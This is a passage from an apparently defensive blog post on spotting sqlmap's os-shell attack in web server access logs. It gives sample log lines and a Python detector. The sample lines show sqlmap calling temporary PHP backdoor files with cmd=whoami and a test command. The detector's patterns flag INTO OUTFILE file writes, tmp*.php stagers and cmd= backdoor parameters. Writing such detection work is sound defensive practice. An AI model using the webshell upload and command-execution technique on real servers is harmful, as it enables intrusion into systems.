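127.0.0.1 - - [16/May/2019:23:10:50 +0800] "POST /tmpumgnt.php?id=1 HTTP/1.1" 200 24 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:10:50 +0800] "GET /tmpbwejn.php?cmd=echo%20command%20execution%20test HTTP/1.1" 200 36 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:11:08 +0800] "GET /tmpbwejn.php?cmd=whoami HTTP/1.1" 200 36 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:12:00 +0800] "GET /SQL/Less-1/?id=1 HTTP/1.1" 200 721 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
                     r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$')
# file-write clauses in a decoded query string (0x03)
FILE_WRITE_RE = re.compile(r"\bINTO\s+(OUT|DUMP)FILE\b|\bLINES\s+TERMINATED\s+BY\b", re.I)
# tmp + a few lowercase letters + web extension, the naming seen for stager and backdoor
TMP_SCRIPT_RE = re.compile(r"/tmp[a-z]{4,6}\.(?:php|asp|aspx|jsp)$", re.I)

def parse_line(line):
    """Combined-format access-log line -> dict, with the query decoded."""
    m = LINE_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    parts = urlsplit(e["target"])
    e["path"] = parts.path
    e["params"] = parse_qsl(parts.query, keep_blank_values=True)  # names are unquoted here
    e["decoded_query"] = unquote(parts.query)
    e["status"] = int(e["status"])
    return e

def classify(e):
    """Rule tags for one request; an empty set means nothing suspicious."""
    tags = set()
    if e["ua"].startswith("sqlmap/"):
        tags.add("sqlmap-ua")                      # default UA (0x01 onwards)
    if any(k.endswith("[]") for k, _ in e["params"]):
        tags.add("fpd-probe")                      # id[]=1 (0x02)
    if FILE_WRITE_RE.search(e["decoded_query"]):
        tags.add("sql-file-write")                 # INTO OUTFILE ... LINES TERMINATED BY (0x03)
    if TMP_SCRIPT_RE.search(e["path"]):
        tags.add("tmp-script")                     # tmpumgnt.php / tmpbwejn.php
        if e["method"] == "POST":
            tags.add("stager-upload")              # multipart POST to the stager (0x09)
    params = dict(e["params"])
    if "cmd" in params and e["path"].endswith(".php"):
        tags.add("cmd-exec")                       # backdoor invocation (0x0a, 0x0b)
        if params["cmd"] == "echo command execution test":
            tags.add("sqlmap-backdoor-check")      # sqlmap's self-test string
    return tags

def scan(log):
    """[(line number, parsed entry, tags)] for every parseable line."""
    out = []
    for n, line in enumerate(log.splitlines(), 1):
        e = parse_line(line)
        if e:
            out.append((n, e, classify(e)))
    return out

def path_walk(log, min_dirs=3):
    """Script names requested under >= min_dirs different directories: the
    shape of the 0x04-0x08 search for where the written file is served."""
    seen = {}
    for _, e, _ in scan(log):
        base = e["path"].rsplit("/", 1)[-1]
        if base:
            seen.setdefault(base, set()).add(e["path"])
    return {b for b, paths in seen.items() if len(paths) >= min_dirs}

if __name__ == "__main__":
    for n, e, tags in scan(SAMPLE_LOG):
        print(n, e["status"], e["method"], e["path"], sorted(tags))
    print("path walk:", path_walk(SAMPLE_LOG))
```

    The User-Agent rule is the weakest of these, since it disappears with --random-agent; the file-write clause in a query string, a multipart POST to a freshly created tmp*.php, and a cmd= parameter on such a file do not depend on the client announcing itself.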
    
    Original URL: https://www.cnblogs.com/BxScope/p/10883422.html